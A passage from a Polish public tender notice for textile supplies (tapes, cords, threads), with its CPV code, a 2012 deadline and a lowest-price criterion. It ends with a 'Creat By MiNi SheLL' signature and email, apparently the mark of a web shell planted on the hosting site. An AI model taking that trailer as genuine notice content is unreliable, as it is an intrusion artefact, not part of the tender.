10.	taśma brezentowa khaki 20	mb	8000;
11.	taśma brezentowa 25x1,5	mb	2500;
12.	linka Pa 10 mm	mb	150;
13.	linka Pa 12 mm	mb	150;
14.	nici SYNTON 40 zielone	szt	10;
15.	nici SYNTON 40 brązowe	szt	10;
16.	nici SYNTON 40 kremowe	szt	10;
17.	nici SYNTON 20 zielone	szt	10;
18.	nici SYNTON 20 zielone khaki	szt	10;
19.	taśma gumowa 20x1 mm	mb	400;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.50.00.00-7.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com